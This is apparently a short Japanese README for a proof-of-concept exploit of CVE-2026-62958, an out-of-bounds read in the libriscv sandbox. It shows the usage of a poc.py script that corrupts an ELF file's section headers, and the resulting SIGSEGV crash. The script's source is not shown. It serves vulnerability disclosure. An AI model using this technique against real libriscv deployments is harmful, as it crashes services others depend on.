
CVE-2026-62958 の Proof-of-Concept エクスプロイト。Libriscv サンドボックスにおけるメモリ範囲外読み取りの脆弱性を実証し、細工された ELF バイナリによってサンドボックスをクラッシュさせることが可能。
Libriscv の脆弱性により、攻撃者は境界外読み取りを使用してサンドボックスをクラッシュさせることができます。
Bad elf を作成するには:
python3 poc.py samplefile poisoned_file
結果:
❯ python3 poc.py fib poisoned_file
Manipulating .text section header at offset 0x250
Manipulating .symtab section header at offset 0x710
❯ ./rvlinux poisoned_file
fish: Job 1, './rvlinux poisoned_file' terminated by signal SIGSEGV (Address boundary error)